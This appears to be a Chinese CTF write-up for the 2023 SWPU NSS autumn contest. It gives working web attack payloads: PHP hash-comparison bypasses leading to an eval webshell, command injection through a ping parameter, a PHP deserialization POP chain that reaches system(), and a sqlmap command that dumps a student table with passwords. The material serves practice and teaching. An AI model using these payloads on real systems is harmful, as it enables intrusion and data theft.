2023年SWPU NSS 秋季招新赛 (校外赛道)

一键连接!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
highlight_file(__FILE__);
error_reporting(0);
$md5_1 = $_GET['md5_1'];
$md5_2 = $_GET['md5_2'];
$sha1_1 = $_GET['sha1_1'];
$sha1_2 = $_GET['sha1_2'];
$new_player =$_GET['new_player'];
if ($md5_1 !== $md5_2 && md5($md5_1) === md5($md5_2)) {
    if ($sha1_1 != $sha1_2 && sha1($sha1_1) === sha1($sha1_2)) {
        if (file_get_contents($new_player) === "Welcome to NSSCTF!!!") {
            echo "Congratulations~~~~~~~~~";
            echo "试试need Antsword<br/>";
            @eval($_POST['Nss']);
        }else{
            echo "可曾听过data协议?";
        }
    } else {
        echo "sha1又如何相等呢";
    }
} else {
    echo "如何让md5值相等呢¿";
}

?md5_1[]=QNKCDZO&md5_2[]=s155964671a&sha1_1[]=aaroZmOk&sha1_2[]=aaK1STfY&new_player=data://text/plain,Welcome to NSSCTF!!!

Nss=system(“cat /flag”);

NSS_HTTP_CHEKER

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /?this_is_get=get_%1t HTTP/1.1
Host: node6.anna.nssctf.cn:28397
User-Agent: NSSCTF
X-Forwarded-For:127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 17
Origin: http://node6.anna.nssctf.cn:28397
Connection: close
Referer: http://node6.anna.nssctf.cn:28397/
Cookie: PHPSESSID=1b41efa492475836bbc4873098999ab3;this_is_cookie=cookie_suki_desu~
Upgrade-Insecure-Requests: 1

this_is_post=p03t

Pingpingping

1
2
3
4
5
6
7
8
9
10
<?php
highlight_file(__FILE__);
error_reporting(0);
$_ping = $_GET['Ping_ip.exe'];
if(isset($_ping)){
    system("ping -c 3 ".$_ping);
}else{
    $data = base64_encode(file_get_contents("error.png"));
    echo "<img src='data:image/png;base64,$data'/>";
}

http://node6.anna.nssctf.cn:28422/?Ping[ip.exe=127.0.0.1;cat /flag

UnS3rialize

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
<?php
class NSS
{
    public $cmd="cat /f*";
    function __invoke()
    {
        echo "Congratulations!!!You have learned to construct a POP chain<br/>";
        system($this->cmd);
    }
    function __wakeup()
    {
        echo "W4keup!!!<br/>";
        $this->cmd = "echo Welcome to NSSCTF";
    }
}
class C
{
    public $whoami;
    function __get($argv)
    {
        echo "what do you want?";
        $want = $this->whoami;
        return $want();
    }
}
class T
{
    public $sth;
    function __toString()
    {
        echo "Now you know how to use __toString<br/>There is more than one way to trigger";
        return $this->sth->var;
    }
}
class F
{
    public $user = "SWPU";
    public $passwd = "NSS";
    public $notes;
//    function __construct($user, $passwd)
//    {
//        $this->user = $user;
//        $this->passwd = $passwd;
//    }
    function __destruct()
    {
        if ($this->user === "SWPU" && $this->passwd === "NSS") {
            echo "Now you know how to use __construct<br/>";
            echo "your notes".$this->notes;
        }else{
            die("N0!");
        }
    }
}

$a=new F();
$a->notes=new T();
$a->notes->sth=new C();
$a->notes->sth->whoami=new NSS();
$b=serialize($a);
echo $b;

O:1:”F”:3:{s:4:”user”;s:4:”SWPU”;s:6:”passwd”;s:3:”NSS”;s:5:”notes”;O:1:”T”:1:{s:3:”sth”;O:1:”C”:1:{s:6:”whoami”;O:3:”NSS”:1:{s:3:”cmd”;s:7:”cat /f*”;}}}}

base64编码传上去即可

python sqlmap.py -r 1.txt -D school -T students -C name,student_id,grade,password -dump -batch

在表格里可以看到flag